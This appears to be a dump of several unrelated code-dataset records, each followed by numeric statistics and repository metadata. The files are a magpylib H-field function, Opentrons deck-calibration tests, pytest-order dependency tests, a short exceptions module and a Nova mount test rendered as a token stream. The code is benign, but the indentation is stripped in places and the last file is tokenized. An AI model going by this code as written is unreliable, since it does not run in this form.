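#     # avoid: [magpy.getB(src, p) for p in grid]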
def getH(
sources=None, observers=None, sumup=False, squeeze=True, pixel_agg=None, **kwargs
):
"""Compute H-field in [kA/m] for given sources and observers.
Field implementations can be directly accessed (avoiding the object oriented
Magpylib interface) by providing a string input `sources=source_type`, array_like
positions as `observers` input, and all other necessary input parameters (see below)
as kwargs.
Parameters
----------
sources: source and collection objects or 1D list thereof
Sources that generate the magnetic field. Can be a single source (or collection)
or a 1D list of l source and/or collection objects.
Direct interface: input must be one of (`'Cuboid'`, `'Cylinder'`, `'CylinderSegment'`,
`'Sphere'`, `'Dipole'`, `'Loop'` or `'Line'`).
observers: array_like or (list of) `Sensor` objects
Can be array_like positions of shape (n1, n2, ..., 3) where the field
should be evaluated, a `Sensor` object with pixel shape (n1, n2, ..., 3) or a list
of such sensor objects (must all have similar pixel shapes). All positions
are given in units of [mm].
Direct interface: Input must be array_like with shape (3,) or (n,3), corresponding
to observer positions in units of [mm].
sumup: bool, default=`False`
If `True`, the fields of all sources are summed up.
squeeze: bool, default=`True`
If `True`, the output is squeezed, i.e. all axes of length 1 in the output (e.g. only
a single sensor or only a single source) are eliminated.
pixel_agg: str, default=`None`
Reference to a compatible numpy aggregator function like `'min'` or `'mean'`,
which is applied to observer output values, e.g. mean of all sensor pixel outputs.
With this option, observer inputs with different (pixel) shapes are allowed.
Other Parameters (Direct interface)
-----------------------------------
position: array_like, shape (3,) or (n,3), default=`(0,0,0)`
Source position(s) in the global coordinates in units of [mm].
orientation: scipy `Rotation` object with length 1 or n, default=`None`
Object orientation(s) in the global coordinates. `None` corresponds to
a unit-rotation.
magnetization: array_like, shape (3,) or (n,3)
Only source_type in (`'Cuboid'`, `'Cylinder'`, `'CylinderSegment'`, `'Sphere'`)!
Magnetization vector(s) (mu0*M, remanence field) in units of [kA/m] given in
the local object coordinates (rotates with object).
moment: array_like, shape (3) or (n,3), unit [mT*mm^3]
Only source_type == `'Dipole'`!
Magnetic dipole moment(s) in units of [mT*mm^3] given in the local object coordinates
(rotates with object). For homogeneous magnets the relation moment=magnetization*volume
holds.
current: array_like, shape (n,)
Only source_type == `'Loop'` or `'Line'`!
Electrical current in units of [A].
dimension: array_like, shape (x,) or (n,x)
Only source_type in (`'Cuboid'`, `'Cylinder'`, `'CylinderSegment'`)!
Magnet dimension input in units of [mm] and [deg]. Dimension format x of sources is the same
as in the object-oriented interface.
diameter: array_like, shape (n,)
Only source_type == `'Sphere'` or `'Loop'`!
Diameter of source in units of [mm].
segment_start: array_like, shape (n,3)
Only source_type == `'Line'`!
Start positions of line current segments in units of [mm].
segment_end: array_like, shape (n,3)
Only source_type == `'Line'`!
End positions of line current segments in units of [mm].
Returns
-------
H-field: ndarray, shape squeeze(m, k, n1, n2, ..., 3)
H-field at each path position (m) for each sensor (k) and each sensor pixel
position (n1, n2, ...) in units of [kA/m]. Sensor pixel positions are equivalent
to simple observer positions. Paths of objects that are shorter than m will be
considered as static beyond their end.
Direct interface: ndarray, shape (n,3)
H-field for every parameter set in units of [kA/m].
Notes
-----
This function automatically joins all sensor and position inputs together and groups
similar sources for optimal vectorization of the computation. For maximal performance
call this function as little as possible and avoid using it in loops.
Examples
--------
In this example we compute the H-field [kA/m] of a spherical magnet and a current loop
at the observer position (1,1,1) given in units of [mm]:
>>> import magpylib as magpy
>>> src1 = magpy.current.Loop(current=100, diameter=2)
>>> src2 = magpy.magnet.Sphere(magnetization=(0,0,100), diameter=1)
>>> H = magpy.getH([src1, src2], (1,1,1))
>>> print(H)
[[4.96243034e+00 4.96243034e+00 2.12454191e+00]
[6.38112147e-01 6.38112147e-01 1.17798322e-16]]
We can also use sensor objects as observers input:
>>> sens1 = magpy.Sensor(position=(1,1,1))
>>> sens2 = sens1.copy(position=(1,1,-1))
>>> H = magpy.getH([src1, src2], [sens1, sens2])
>>> print(H)
[[[ 4.96243034e+00 4.96243034e+00 2.12454191e+00]
[-4.96243034e+00 -4.96243034e+00 2.12454191e+00]]
<BLANKLINE>
[[ 6.38112147e-01 6.38112147e-01 1.17798322e-16]
[-6.38112147e-01 -6.38112147e-01 1.17798322e-16]]]
Through the direct interface we can compute the same fields for the loop as:
>>> obs = [(1,1,1), (1,1,-1)]
>>> H = magpy.getH('Loop', obs, current=100, diameter=2)
>>> print(H)
[[ 4.96243034 4.96243034 2.12454191]
[-4.96243034 -4.96243034 2.12454191]]
But also for a set of four completely different instances:
>>> H = magpy.getH(
... 'Loop',
... observers=((1,1,1), (1,1,-1), (1,2,3), (2,2,2)),
... current=(11, 22, 33, 44),
... diameter=(1, 2, 3, 4),
... position=((0,0,0), (0,0,1), (0,0,2), (0,0,3)),
... )
>>> print(H)
[[ 0.1361676 0.1361676 0.01356947]
[-0.30917477 -0.30917477 0.39311875]
[ 0.91286143 1.82572286 -0.17559045]
[-1.97522001 -1.97522001 -0.63410104]]
"""
return getBH_level2(
sources,
observers,
sumup=sumup,
squeeze=squeeze,
pixel_agg=pixel_agg,
field="H",
**kwargs
)
| 40.943038
| 99
| 0.630778
| 1,845
| 12,938
| 4.391328
| 0.145799
| 0.00938
| 0.028882
| 0.021723
| 0.942236
| 0.939027
| 0.913848
| 0.906196
| 0.897803
| 0.855591
| 0
| 0.095712
| 0.239295
| 12,938
| 315
| 100
| 41.073016
| 0.727494
| 0.879425
| 0
| 0.72
| 0
| 0
| 0.00315
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.08
| false
| 0
| 0.04
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5b34ea69be0d894dea4ab9ac8d6ed5111c5140bc
| 13,550
|
py
|
Python
|
api/tests/opentrons/server/calibration_integration_test.py
|
wheresaddie/opentrons
|
b90a87e2b45ea3db7677d130d683249460e4b91a
|
[
"Apache-2.0"
] | null | null | null |
api/tests/opentrons/server/calibration_integration_test.py
|
wheresaddie/opentrons
|
b90a87e2b45ea3db7677d130d683249460e4b91a
|
[
"Apache-2.0"
] | null | null | null |
api/tests/opentrons/server/calibration_integration_test.py
|
wheresaddie/opentrons
|
b90a87e2b45ea3db7677d130d683249460e4b91a
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import pytest
from opentrons import types
from opentrons import deck_calibration as dc
from opentrons.deck_calibration import endpoints
from opentrons.trackers.pose_tracker import absolute
from opentrons.config.pipette_config import Y_OFFSET_MULTI
from opentrons.hardware_control.types import CriticalPoint
# Note that several values in this file have target/expected values that do not
# accurately reflect robot operation, because of differences between return
# values from the driver during simulating vs. non-simulating modes. In
# particular, during simulating mode the driver's `position` method returns
# the xyz position of the tip of the pipette, but during non-simulating mode
# it returns a position that corresponds roughly to the gantry (e.g.: where the
# Smoothie board sees the position of itself--after a fashion). Simulating mode
# should be replaced with something that accurately reflects actual robot
# operation, and then these tests should be revised to match expected reality.
@pytest.mark.api1_only
async def test_transform_from_moves(async_server, async_client, monkeypatch):
test_mount, test_model = ('left', 'p300_multi_v1')
hardware = async_server['com.opentrons.hardware']
def dummy_read_model(mount):
if mount == test_mount:
return test_model
else:
return None
monkeypatch.setattr(
hardware._driver, 'read_pipette_model', dummy_read_model)
hardware.reset()
hardware.home()
# This is difficult to test without the `async_client` because it has to
# take an `aiohttp.web.Request` object as a parameter instead of a dict
resp = await async_client.post('/calibration/deck/start')
start_res = await resp.json()
token = start_res.get('token')
assert start_res.get('pipette', {}).get('mount') == test_mount
assert start_res.get('pipette', {}).get('model') == test_model
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'attach tip', 'tipLength': 51.7})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': 'safeZ'})
assert res.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'z',
'direction': -1,
'step': 4.5})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save z'})
assert res.status == 200
pipette = endpoints.session.pipettes[test_mount]
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': '1'})
assert res.status == 200
pt1 = endpoints.safe_points().get('1')
if 'multi' in test_model:
expected1 = (
pt1[0],
pt1[1] + 2 * Y_OFFSET_MULTI,
pt1[2])
else:
expected1 = pt1
assert np.isclose(absolute(hardware.poses, pipette), expected1).all()
# Jog to calculated position for transform
x_delta1 = 13.16824337 - dc.endpoints.safe_points()['1'][0]
y_delta1 = 8.30855312 - dc.endpoints.safe_points()['1'][1]
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'x',
'direction': 1,
'step': x_delta1})
assert jogres.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'y',
'direction': 1,
'step': y_delta1})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save xy', 'point': '1'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': '2'})
assert res.status == 200
pt2 = endpoints.safe_points().get('2')
if 'multi' in test_model:
expected2 = (
pt2[0],
pt2[1] + 2 * Y_OFFSET_MULTI,
pt2[2])
else:
expected2 = pt2
assert np.isclose(absolute(hardware.poses, pipette), expected2).all()
# Jog to calculated position for transform
x_delta2 = 380.50507635 - dc.endpoints.safe_points()['2'][0]
y_delta2 = -23.82925545 - dc.endpoints.safe_points()['2'][1]
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'x',
'direction': 1,
'step': x_delta2})
assert jogres.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'y',
'direction': 1,
'step': y_delta2})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save xy', 'point': '2'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': '3'})
assert res.status == 200
pt3 = endpoints.safe_points().get('3')
if 'multi' in test_model:
expected3 = (
pt3[0],
pt3[1] + 2 * Y_OFFSET_MULTI,
pt3[2])
else:
expected3 = pt3
assert np.isclose(absolute(hardware.poses, pipette), expected3).all()
# Jog to calculated position for transform
x_delta3 = 34.87002331 - dc.endpoints.safe_points()['3'][0]
y_delta3 = 256.36103295 - dc.endpoints.safe_points()['3'][1]
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'x',
'direction': 1,
'step': x_delta3})
assert jogres.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'y',
'direction': 1,
'step': y_delta3})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save xy', 'point': '3'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save transform'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'release'})
assert res.status == 200
# This transform represents a 5 degree rotation, with a shift in x, y, & z.
# Values for the points and expected transform come from a hand-crafted
# transformation matrix and the points that would generate that matrix.
cos_5deg_p = 0.9962
sin_5deg_p = 0.0872
sin_5deg_n = -sin_5deg_p
const_zero = 0.0
const_one_ = 1.0
delta_x___ = 0.3
delta_y___ = 0.4
delta_z___ = 0.5
expected_transform = [
[cos_5deg_p, sin_5deg_p, const_zero, delta_x___],
[sin_5deg_n, cos_5deg_p, const_zero, delta_y___],
[const_zero, const_zero, const_one_, delta_z___],
[const_zero, const_zero, const_zero, const_one_]]
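    # Quick check of the hand-crafted constants above (illustrative):
    #   cos(5 deg) = 0.99619...  -> rounded to 0.9962
    #   sin(5 deg) = 0.08716...  -> rounded to 0.0872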
actual_transform = hardware.config.gantry_calibration
assert np.allclose(actual_transform, expected_transform)
@pytest.mark.api2_only
async def test_transform_from_moves_v2(
async_server, async_client, monkeypatch):
test_mount, test_model = (types.Mount.LEFT, 'p300_multi_v1')
hardware = async_server['com.opentrons.hardware']
await hardware.reset()
await hardware.cache_instruments({
test_mount: test_model,
types.Mount.RIGHT: None})
await hardware.home()
# This is difficult to test without the `async_client` because it has to
# take an `aiohttp.web.Request` object as a parameter instead of a dict
resp = await async_client.post('/calibration/deck/start')
start_res = await resp.json()
token = start_res.get('token')
assert start_res.get('pipette', {}).get('mount') == 'left'
assert start_res.get('pipette', {}).get('model') == test_model
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'attach tip', 'tipLength': 51.7})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': 'safeZ'})
assert res.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'z',
'direction': -1,
'step': 4.5})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save z'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': '1'})
assert res.status == 200
expected1 = endpoints.safe_points().get('1')
coordinates = await hardware.gantry_position(
test_mount, critical_point=CriticalPoint.FRONT_NOZZLE)
position = (
coordinates.x,
coordinates.y,
coordinates.z)
assert np.isclose(position, expected1).all()
# Jog to calculated position for transform
x_delta1 = 13.16824337 - dc.endpoints.safe_points()['1'][0]
y_delta1 = 8.30855312 - dc.endpoints.safe_points()['1'][1]
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'x',
'direction': 1,
'step': x_delta1})
assert jogres.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'y',
'direction': 1,
'step': y_delta1})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save xy', 'point': '1'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': '2'})
assert res.status == 200
expected2 = endpoints.safe_points().get('2')
coordinates = await hardware.gantry_position(
test_mount, critical_point=CriticalPoint.FRONT_NOZZLE)
position = (
coordinates.x,
coordinates.y,
coordinates.z)
assert np.isclose(position, expected2).all()
# Jog to calculated position for transform
x_delta2 = 380.50507635 - dc.endpoints.safe_points()['2'][0]
y_delta2 = -23.82925545 - dc.endpoints.safe_points()['2'][1]
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'x',
'direction': 1,
'step': x_delta2})
assert jogres.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'y',
'direction': 1,
'step': y_delta2})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save xy', 'point': '2'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'move', 'point': '3'})
assert res.status == 200
expected3 = endpoints.safe_points().get('3')
coordinates = await hardware.gantry_position(
test_mount, critical_point=CriticalPoint.FRONT_NOZZLE)
position = (
coordinates.x,
coordinates.y,
coordinates.z)
assert np.isclose(position, expected3).all()
# Jog to calculated position for transform
x_delta3 = 34.87002331 - dc.endpoints.safe_points()['3'][0]
y_delta3 = 256.36103295 - dc.endpoints.safe_points()['3'][1]
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'x',
'direction': 1,
'step': x_delta3})
assert jogres.status == 200
jogres = await async_client.post('/calibration/deck', json={
'token': token,
'command': 'jog',
'axis': 'y',
'direction': 1,
'step': y_delta3})
assert jogres.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save xy', 'point': '3'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'save transform'})
assert res.status == 200
res = await async_client.post('/calibration/deck', json={
'token': token, 'command': 'release'})
assert res.status == 200
# This transform represents a 5 degree rotation, with a shift in x, y, & z.
# Values for the points and expected transform come from a hand-crafted
# transformation matrix and the points that would generate that matrix.
cos_5deg_p = 0.9962
sin_5deg_p = 0.0872
sin_5deg_n = -sin_5deg_p
const_zero = 0.0
const_one_ = 1.0
delta_x___ = 0.3
delta_y___ = 0.4
delta_z___ = 0.5
expected_transform = [
[cos_5deg_p, sin_5deg_p, const_zero, delta_x___],
[sin_5deg_n, cos_5deg_p, const_zero, delta_y___],
[const_zero, const_zero, const_one_, delta_z___],
[const_zero, const_zero, const_zero, const_one_]]
conf = await hardware.config
actual_transform = conf.gantry_calibration
assert np.allclose(actual_transform, expected_transform)
| 36.229947
| 79
| 0.628192
| 1,709
| 13,550
| 4.819778
| 0.132241
| 0.056088
| 0.073813
| 0.092267
| 0.837926
| 0.809518
| 0.804905
| 0.780988
| 0.780988
| 0.752823
| 0
| 0.04143
| 0.232251
| 13,550
| 373
| 80
| 36.327078
| 0.75036
| 0.120295
| 0
| 0.796667
| 0
| 0
| 0.153775
| 0.007567
| 0
| 0
| 0
| 0
| 0.16
| 1
| 0.003333
| false
| 0
| 0.026667
| 0
| 0.036667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b525b468556b6951f8a5bc799cf90a478ceee6a
| 5,743
|
py
|
Python
|
tests/test_order_group_scope_named_dep.py
|
mrbean-bremen/pytest-order
|
50cb2f3735b6e6a02046f44eefc928e6a9da5268
|
[
"MIT"
] | 12
|
2020-11-17T16:58:05.000Z
|
2021-06-08T06:26:37.000Z
|
tests/test_order_group_scope_named_dep.py
|
mrbean-bremen/pytest-order
|
50cb2f3735b6e6a02046f44eefc928e6a9da5268
|
[
"MIT"
] | 8
|
2020-10-24T18:34:43.000Z
|
2021-03-04T08:08:19.000Z
|
tests/test_order_group_scope_named_dep.py
|
mrbean-bremen/pytest-order
|
50cb2f3735b6e6a02046f44eefc928e6a9da5268
|
[
"MIT"
] | 1
|
2020-12-07T12:29:47.000Z
|
2020-12-07T12:29:47.000Z
|
# -*- coding: utf-8 -*-
import os
import shutil
import pytest
import pytest_order
from tests.utils import write_test, assert_test_order
@pytest.fixture(scope="module")
def fixture_path(tmpdir_factory):
fixture_path = str(tmpdir_factory.mktemp("named_dep_scope"))
testname = os.path.join(fixture_path, "test_named_dep1.py")
test_class_contents = """
import pytest
class Test1:
@pytest.mark.dependency(depends=['Test2_test2'])
def test_one(self):
assert True
def test_two(self):
assert True
class Test2:
def test_one(self):
assert True
@pytest.mark.dependency(name='Test2_test2',
depends=['dep3_test_two'], scope='session')
def test_two(self):
assert True
"""
write_test(testname, test_class_contents)
test_function_contents = """
import pytest
@pytest.mark.dependency(depends=['dep3_test_two'], scope='session')
def test_one():
assert True
def test_two():
assert True
"""
testname = os.path.join(fixture_path, "test_named_dep2.py")
write_test(testname, test_function_contents)
test_function_contents = """
import pytest
def test_one():
assert True
@pytest.mark.dependency(name='dep3_test_two')
def test_two():
assert True
"""
testname = os.path.join(fixture_path, "test_named_dep3.py")
write_test(testname, test_function_contents)
test_function_contents = """
import pytest
def test_one():
assert True
def test_two():
assert True
"""
testname = os.path.join(fixture_path, "test_named_dep4.py")
write_test(testname, test_function_contents)
yield fixture_path
shutil.rmtree(fixture_path, ignore_errors=True)
@pytest.fixture(scope="module")
def fixture_file_paths(fixture_path):
yield [
os.path.join(fixture_path, "test_named_dep1.py"),
os.path.join(fixture_path, "test_named_dep2.py"),
os.path.join(fixture_path, "test_named_dep3.py"),
os.path.join(fixture_path, "test_named_dep4.py")
]
@pytest.mark.skipif(pytest.__version__.startswith("3.7."),
reason="pytest-dependency < 0.5 does not support "
"session scope")
def test_session_scope(fixture_path, capsys):
args = ["-v", "--order-dependencies", fixture_path]
pytest.main(args, [pytest_order])
out, err = capsys.readouterr()
expected = (
"test_named_dep1.py::Test1::test_two",
"test_named_dep1.py::Test2::test_one",
"test_named_dep2.py::test_two",
"test_named_dep3.py::test_one",
"test_named_dep3.py::test_two",
"test_named_dep1.py::Test2::test_two",
"test_named_dep1.py::Test1::test_one",
"test_named_dep2.py::test_one",
"test_named_dep4.py::test_one",
"test_named_dep4.py::test_two",
)
assert_test_order(expected, out)
assert "SKIPPED" not in out
@pytest.mark.skipif(pytest.__version__.startswith("3.7."),
reason="pytest-dependency < 0.5 does not support "
"session scope")
def test_module_group_scope(fixture_path, capsys):
args = ["-v", "--order-dependencies",
"--order-group-scope=module", fixture_path]
pytest.main(args, [pytest_order])
out, err = capsys.readouterr()
expected = (
"test_named_dep3.py::test_one",
"test_named_dep3.py::test_two",
"test_named_dep1.py::Test1::test_two",
"test_named_dep1.py::Test2::test_one",
"test_named_dep1.py::Test2::test_two",
"test_named_dep1.py::Test1::test_one",
"test_named_dep2.py::test_one",
"test_named_dep2.py::test_two",
"test_named_dep4.py::test_one",
"test_named_dep4.py::test_two",
)
assert_test_order(expected, out)
assert "SKIPPED" not in out
@pytest.mark.skipif(pytest.__version__.startswith("3.7."),
reason="pytest-dependency < 0.5 does not support "
"session scope")
def test_class_group_scope(fixture_path, capsys):
args = ["-v", "--order-dependencies",
"--order-group-scope=class", fixture_path]
pytest.main(args, [pytest_order])
out, err = capsys.readouterr()
expected = (
"test_named_dep3.py::test_one",
"test_named_dep3.py::test_two",
"test_named_dep1.py::Test2::test_one",
"test_named_dep1.py::Test2::test_two",
"test_named_dep1.py::Test1::test_one",
"test_named_dep1.py::Test1::test_two",
"test_named_dep2.py::test_one",
"test_named_dep2.py::test_two",
"test_named_dep4.py::test_one",
"test_named_dep4.py::test_two",
)
assert_test_order(expected, out)
assert "SKIPPED" not in out
@pytest.mark.skipif(pytest.__version__.startswith("3.7."),
reason="pytest-dependency < 0.5 does not support "
"session scope")
def test_class_group_scope_module_scope(fixture_path, capsys):
args = ["-v", "--order-dependencies", "--order-group-scope=class",
"--order-scope=module", fixture_path]
pytest.main(args, [pytest_order])
out, err = capsys.readouterr()
expected = (
"test_named_dep1.py::Test2::test_one",
"test_named_dep1.py::Test2::test_two",
"test_named_dep1.py::Test1::test_one",
"test_named_dep1.py::Test1::test_two",
"test_named_dep2.py::test_one",
"test_named_dep2.py::test_two",
"test_named_dep3.py::test_one",
"test_named_dep3.py::test_two",
"test_named_dep4.py::test_one",
"test_named_dep4.py::test_two",
)
assert_test_order(expected, out)
    # with --order-scope=module, cross-module dependencies cannot be ordered as needed,
    # so the dependent tests are skipped
assert "SKIPPED" in out
| 31.554945
| 71
| 0.64879
| 760
| 5,743
| 4.577632
| 0.106579
| 0.124174
| 0.063237
| 0.09198
| 0.861742
| 0.861742
| 0.805116
| 0.77781
| 0.743604
| 0.687841
| 0
| 0.019991
| 0.216089
| 5,743
| 181
| 72
| 31.729282
| 0.752777
| 0.014104
| 0
| 0.723684
| 0
| 0
| 0.461212
| 0.268599
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.039474
| false
| 0
| 0.059211
| 0
| 0.098684
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5b77d7d4e0c6322ebbd4d5b71403682bb45e662c
| 415
|
py
|
Python
|
apps/overlay_manager/exceptions.py
|
matcala/cs-e4300_wireguard-mesh
|
b5fb64923a133f9c31dde5396de460cf749b4a59
|
[
"MIT"
] | null | null | null |
apps/overlay_manager/exceptions.py
|
matcala/cs-e4300_wireguard-mesh
|
b5fb64923a133f9c31dde5396de460cf749b4a59
|
[
"MIT"
] | null | null | null |
apps/overlay_manager/exceptions.py
|
matcala/cs-e4300_wireguard-mesh
|
b5fb64923a133f9c31dde5396de460cf749b4a59
|
[
"MIT"
] | 1
|
2022-01-28T17:18:46.000Z
|
2022-01-28T17:18:46.000Z
|
class StartupError(Exception):
    def __init__(self, message):
        super().__init__(message)
        self.message = message
class DeviceRegistrationError(Exception):
    def __init__(self, message):
        super().__init__(message)
        self.message = message
class OverlayRegistrationError(Exception):
    def __init__(self, message):
        super().__init__(message)
        self.message = message
class CannotAddToOverlay(Exception):
    def __init__(self, message):
        super().__init__(message)
        self.message = message
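# Illustrative usage (not part of the module): each exception carries a human-readable
# message that callers can surface when overlay or device registration fails.
#
#     try:
#         raise DeviceRegistrationError("device already registered")
#     except DeviceRegistrationError as err:
#         print(err.message)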
| 21.842105
| 42
| 0.706024
| 40
| 415
| 6.925
| 0.25
| 0.31769
| 0.231047
| 0.288809
| 0.703971
| 0.703971
| 0.703971
| 0.703971
| 0.541516
| 0
| 0
| 0
| 0.207229
| 415
| 18
| 43
| 23.055556
| 0.841945
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
754285744da5e07107626f5655d64ea5691d1e1b
| 19,038
|
py
|
Python
|
nova/tests/unit/virt/disk/mount/test_api.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/virt/disk/mount/test_api.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | null | null | null |
nova/tests/unit/virt/disk/mount/test_api.py
|
bopopescu/nova-token
|
ec98f69dea7b3e2b9013b27fd55a2c1a1ac6bfb2
|
[
"Apache-2.0"
] | 2
|
2017-07-20T17:31:34.000Z
|
2020-07-24T02:42:19.000Z
|
begin_unit
comment|'# Copyright 2015 Hewlett-Packard Development Company, L.P.'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may'
nl|'\n'
comment|'# not use this file except in compliance with the License. You may obtain'
nl|'\n'
comment|'# a copy of the License at'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# http://www.apache.org/licenses/LICENSE-2.0'
nl|'\n'
comment|'#'
nl|'\n'
comment|'# Unless required by applicable law or agreed to in writing, software'
nl|'\n'
comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT'
nl|'\n'
comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the'
nl|'\n'
comment|'# License for the specific language governing permissions and limitations'
nl|'\n'
comment|'# under the License.'
nl|'\n'
nl|'\n'
name|'import'
name|'mock'
newline|'\n'
nl|'\n'
name|'from'
name|'nova'
name|'import'
name|'test'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'disk'
op|'.'
name|'mount'
name|'import'
name|'api'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'disk'
op|'.'
name|'mount'
name|'import'
name|'block'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'disk'
op|'.'
name|'mount'
name|'import'
name|'loop'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'disk'
op|'.'
name|'mount'
name|'import'
name|'nbd'
newline|'\n'
name|'from'
name|'nova'
op|'.'
name|'virt'
op|'.'
name|'image'
name|'import'
name|'model'
name|'as'
name|'imgmodel'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|variable|PARTITION
name|'PARTITION'
op|'='
number|'77'
newline|'\n'
DECL|variable|ORIG_DEVICE
name|'ORIG_DEVICE'
op|'='
string|'"/dev/null"'
newline|'\n'
DECL|variable|AUTOMAP_PARTITION
name|'AUTOMAP_PARTITION'
op|'='
string|'"/dev/nullp77"'
newline|'\n'
DECL|variable|MAP_PARTITION
name|'MAP_PARTITION'
op|'='
string|'"/dev/mapper/nullp77"'
newline|'\n'
nl|'\n'
nl|'\n'
DECL|class|MountTestCase
name|'class'
name|'MountTestCase'
op|'('
name|'test'
op|'.'
name|'NoDBTestCase'
op|')'
op|':'
newline|'\n'
DECL|member|setUp
indent|' '
name|'def'
name|'setUp'
op|'('
name|'self'
op|')'
op|':'
newline|'\n'
indent|' '
name|'super'
op|'('
name|'MountTestCase'
op|','
name|'self'
op|')'
op|'.'
name|'setUp'
op|'('
op|')'
newline|'\n'
nl|'\n'
DECL|member|_test_map_dev
dedent|''
name|'def'
name|'_test_map_dev'
op|'('
name|'self'
op|','
name|'partition'
op|')'
op|':'
newline|'\n'
indent|' '
name|'mount'
op|'='
name|'api'
op|'.'
name|'Mount'
op|'('
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'image'
op|','
name|'mock'
op|'.'
name|'sentinel'
op|'.'
name|'mount_dir'
op|')'
newline|'\n'
name|'mount'
op|'.'
name|'device'
op|'='
name|'ORIG_DEVICE'
newline|'\n'
name|'mount'
op|'.'
name|'partition'
op|'='
name|'partition'
newline|'\n'
name|'mount'
op|'.'
name|'map_dev'
op|'('
op|')'
newline|'\n'
name|'return'
name|'mount'
newline|'\n'
nl|'\n'
dedent|''
op|'@'
name|'mock'
op|'.'
name|'patch'
op|'('
string|"'nova.utils.trycmd'"
op|')'
newline|'\n'
DECL|member|_test_map_dev_with_trycmd
name|'def'
name|'_test_map_dev_with_trycmd'
op|'('
name|'self'
op|','
